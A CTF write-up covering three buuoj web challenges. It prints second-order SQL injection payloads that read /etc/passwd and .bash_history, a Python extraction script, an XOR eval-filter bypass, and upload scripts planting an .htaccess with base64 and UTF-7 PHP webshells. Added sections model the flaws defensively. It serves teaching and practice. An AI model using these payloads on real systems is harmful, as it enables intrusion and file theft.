2020.04.05 Notes on recent buuoj challenges

I couldn't be bothered to write one post per challenge, so here is a record of the ones I solved over the past few days.

网鼎杯 2018: Comment

1. Brute-force the password

2. Recover the source from the exposed .git directory

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
    switch ($_GET['do'])
    {
        case 'write':
            // escaped once here, before the first insert
            $category = addslashes($_POST['category']);
            $title = addslashes($_POST['title']);
            $content = addslashes($_POST['content']);
            $sql = "insert into board
                    set category = '$category',
                        title = '$title',
                        content = '$content'";
            $result = mysql_query($sql);
            header("Location: ./index.php");
            break;
        case 'comment':
            $bo_id = addslashes($_POST['bo_id']);
            $sql = "select category from board where id='$bo_id'";
            $result = mysql_query($sql);
            $num = mysql_num_rows($result);
            if($num>0){
                // category comes back from the database unescaped and is interpolated as-is
                $category = mysql_fetch_array($result)['category'];
                $content = addslashes($_POST['content']);
                $sql = "insert into comment
                        set category = '$category',
                            content = '$content',
                            bo_id = '$bo_id'";
                $result = mysql_query($sql);
            }
            header("Location: ./comment.php?id=$bo_id");
            break;
        default:
            header("Location: ./index.php");
    }
}
else{
    header("Location: ./index.php");
}
?>

Both insert operations escape special characters before writing, which is the classic shape of a second-order injection: the second insert queries the category stored by the first insert and interpolates it without escaping it again, so the injection point is category.

Note that the executed statement spans several lines. A single-line comment (# or --) would only swallow the rest of the current line and the remaining lines would still be parsed, so a block comment (/* ... */) has to be used.

3. Read files through MySQL: first read /etc/passwd to find the user's home directory, then read .bash_history, then .DS_Store, which finally reveals the flag file name.

Set the post's category to:

1',content=hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php')),/*

Then post the comment:

*/#

The statement that actually runs is then:

$sql = "insert into comment
            set category = '1',content=hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php')),/*',
                content = '*/#',
                bo_id = '$bo_id'";

and the file contents are echoed back in the content field.
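To make the write/read round trip concrete, here is a constructed sqlite3 model of the two requests (added here; it is not the challenge's PHP). MySQL's INSERT ... SET form is written as INSERT ... VALUES, and SQLite's quote doubling stands in for addslashes(): the escaping applied at write time is gone when the category is read back, so interpolating it into the second INSERT breaks the statement (or, with a crafted value as above, reshapes it), while binding the values stores them literally.

```python
import sqlite3

# Constructed sqlite3 model of the board/comment flow above (not the challenge's
# PHP). MySQL's "INSERT ... SET" is written as INSERT ... VALUES here.
SCHEMA = """
CREATE TABLE board   (id INTEGER PRIMARY KEY, category TEXT, title TEXT, content TEXT);
CREATE TABLE comment (id INTEGER PRIMARY KEY, category TEXT, content TEXT, bo_id INTEGER);
"""

def escape(s: str) -> str:
    """Write-time escaping, the role addslashes() plays in the PHP. SQLite has
    no backslash escapes, so quotes are doubled; the round trip is identical:
    the database stores the *unescaped* text."""
    return s.replace("'", "''")

def comment_flow(category: str, comment: str, parameterized: bool) -> str:
    """Write a post with the given category, then comment on it; return the
    category that ended up in the comment row, or a description of the failure."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    # Request 1 (do=write): escaped before interpolation, so this statement is sound.
    db.execute("INSERT INTO board (category, title, content) VALUES ('%s', 't', 'c')"
               % escape(category))
    # Request 2 (do=comment): the category comes back from the DB without the escaping...
    (stored,) = db.execute("SELECT category FROM board WHERE id = 1").fetchone()
    try:
        if parameterized:
            # Fix: bind every value, whether it came from the client or from the DB.
            db.execute("INSERT INTO comment (category, content, bo_id) VALUES (?, ?, ?)",
                       (stored, comment, 1))
        else:
            # ...and is interpolated raw. Only the client-supplied comment is escaped,
            # exactly as in the PHP: this is the second-order injection point.
            db.execute("INSERT INTO comment (category, content, bo_id) VALUES ('%s', '%s', 1)"
                       % (stored, escape(comment)))
    except sqlite3.OperationalError as exc:
        return "query broken by stored category: %s" % exc
    (cat,) = db.execute("SELECT category FROM comment WHERE bo_id = 1").fetchone()
    return cat

if __name__ == "__main__":
    for mode in (False, True):
        print("parameterized=%s ->" % mode, comment_flow("O'Reilly", "nice post", mode))
```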

网鼎杯 2018: Unfinish

There are only two functions, register and login; the username entered at registration is displayed on the page after logging in.

Testing shows a second-order injection in the username field at registration.

Probe which characters are filtered:

1' and ',

It turns out that #, --, information and so on are all blocked.

Since the username is echoed back, the data can be brought out directly with the + operator (used here as a "concatenation" operator):

0'+ hex(database()) + '0

However, after hex encoding, the addition converts the string to a number before adding, so a single hex encoding can give an inaccurate result; that is why the value is hex-encoded twice in the script.

As for the flag table... I only learned about it from the writeup...

import requests
import random
import re

url = 'http://7d3b921b-23df-4e79-b88a-778ac08f4770.node3.buuoj.cn/'

flag = ''

# read the flag 10 characters at a time; each round registers a fresh account
for i in range(1, 10000, 10):
    count = random.randint(1, 100000)
    # hex() twice so that + does not turn the string into a number
    payload = "0'+ substr(hex(hex((select * from flag)))from {} for 10) + '0".format(i)
    print(payload)

    data = {
        'email': str(count) + '@qq.com',
        'username': payload,
        'password': "123456"
    }

    register = requests.post(url + 'register.php', data=data)

    headers = {
        'Cookie': 'PHPSESSID=' + str(count)
    }

    data = {
        'email': str(count) + '@qq.com',
        'password': '123456'
    }

    login = requests.post(url + 'login.php', data=data, headers=headers)

    # the username (i.e. the injected slice) is shown on the index page after login
    index = requests.get(url, headers=headers).text
    res = re.findall('<span class="user-name">(.*?)</span>', index, re.S)[0]
    res = res.replace(' ', '').replace('\n', '')
    flag += res
    print(flag)

SUCTF 2019: EasyWeb

<?php
function get_the_flag(){
    // webadmin will remove your upload file every 20 min!!!!
    $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
    if(!file_exists($userdir)){
        mkdir($userdir);
    }
    if(!empty($_FILES["file"])){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name,".")+1);
        if(preg_match("/ph/i",$extension)) die("^_^");
        if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
        if(!exif_imagetype($tmp_name)) die("^_^");
        $path= $userdir."/".$name;
        @move_uploaded_file($tmp_name, $path);
        print_r($path);
    }
}

$hhh = @$_GET['_'];

if (!$hhh){
    highlight_file(__FILE__);
}

if(strlen($hhh)>18){
    die('One inch long, one inch strong!');
}

if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
    die('Try something else!');

$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");

eval($hhh);
?>

Part 1. Calling a function without alphanumeric characters

Build the string _GET with XOR:

echo urlencode('_GET'^"\xff\xff\xff\xff");

Then call it with:

${_GET}{%ff}()&%ff=get_the_flag

Part 2. File upload

The upload is subject to the following restrictions:

  • the file content must not contain <?

  • exif_imagetype is used to decide whether the file is an image

  • the extension must not contain ph

The construction from Part 1 lets us call phpinfo, which shows the target runs Apache + PHP 7.2, so uploading a .htaccess file to get around the extension check comes to mind.

Use the XBM format (X BitMap) to get past the image check by prepending the following to the .htaccess:

#define width 1337
#define height 1337

In .htaccess, # starts a comment, so Apache still parses the file normally.

Getting past the <? check:

Method 1. Include the file through php://filter (via auto_append_file) with the shell encoded as base64 or similar.

import requests

url = 'http://4a5937f1-0451-46a2-a64b-9ac04683d515.node3.buuoj.cn/?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag'

# the "12" after GIF89a pads the prefix to 8 bytes so the base64 decode stays aligned
shell = b'GIF89a12PD9waHAgZXZhbCgkX0dFVFsnYyddKTs/Pg=='

files = {
    'file': ('shell.abc', shell)
}

res = requests.post(url, files=files).text

print(res)

htaccess = b'''
#define width 1337
#define height 1337
AddType application/x-httpd-php .abc
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_76d9f00467e5ee6abc3ca60892ef304e/shell.abc"
'''

print(htaccess)

files = {
    'file': ('.htaccess', htaccess)
}

res = requests.post(url, files=files).text
print(res)

Method 2. Use an encoding such as UTF-7 or UTF-16

#define width 1337
#define height 1337
AddType application/x-httpd-php .aaa
php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"

Then encode the shell content in the matching encoding.

import requests

url = 'http://bd245d1d-9815-4363-b5f2-101a2b3abf96.node3.buuoj.cn/?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag'

shell = b'''
#define width 1337
#define height 1337
+ADw?php +AEA-eval(+ACQAXw-POST+AFs't'+AF0)+ADs ?+AD4-
'''

files = {
    'file': ('shell.abc', shell)
}

res = requests.post(url, files=files).text

print(res)

htaccess = b'''
#define width 1337
#define height 1337
AddType application/x-httpd-php .abc
php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"
'''

print(htaccess)

files = {
    'file': ('.htaccess', htaccess)
}

res = requests.post(url, files=files).text
print(res)
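Looking at the three upload restrictions from Part 2 as a defender: the Python below (added here; not part of the writeup or the challenge) models those checks next to an allowlist-based validator, and shows that the XBM-headed .htaccess and the GIF-prefixed shell.abc pass the former and fail the latter. The exif_imagetype() signature list is a reduced assumption and the sample files are constructed.

```python
import os
import re
import secrets

# Magic bytes of the image types the upload endpoint should accept (allowlist).
IMAGE_MAGIC = {
    "gif": b"GIF8",
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}
# exif_imagetype() also accepts text formats such as XBM, which start with "#define ".
# Assumption: this reduced signature list is enough to model the challenge's check.
EXIF_SIGNATURES = list(IMAGE_MAGIC.values()) + [b"#define "]

def challenge_check(name: str, content: bytes) -> bool:
    """The three checks get_the_flag() performs, transcribed from the PHP above."""
    ext = name[name.rfind(".") + 1:]          # substr($name, strrpos($name, ".") + 1)
    if re.search(r"ph", ext, re.I):           # preg_match("/ph/i", $extension)
        return False
    if b"<?" in content:                      # mb_strpos(..., '<?') !== False
        return False
    return any(content.startswith(sig) for sig in EXIF_SIGNATURES)  # exif_imagetype()

def strict_check(name: str, content: bytes) -> bool:
    """Allowlist replacement: fixed extension set, no dotfiles or double extensions,
    and the body must begin with the magic bytes of that particular type."""
    base = os.path.basename(name)
    if base.startswith(".") or base.count(".") != 1:
        return False
    stem, ext = base.lower().split(".")
    if not re.fullmatch(r"[a-z0-9_-]{1,64}", stem) or ext not in IMAGE_MAGIC:
        return False
    return content.startswith(IMAGE_MAGIC[ext])

def stored_name(name: str) -> str:
    """Never reuse the client's file name on disk: keep only the validated extension."""
    ext = os.path.basename(name).rsplit(".", 1)[-1].lower()
    return secrets.token_hex(16) + "." + ext

# Constructed samples mirroring the two uploads in the writeup, plus a PNG header.
XBM_HTACCESS = b"#define width 1337\n#define height 1337\nAddType application/x-httpd-php .abc\n"
GIF_SHELL = b"GIF89a12" + b"<base64 body would follow>"
PNG_FILE = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR"
```

Independently of the filter, serving uploads from a directory configured with AllowOverride None and no PHP handler removes the .htaccess route entirely.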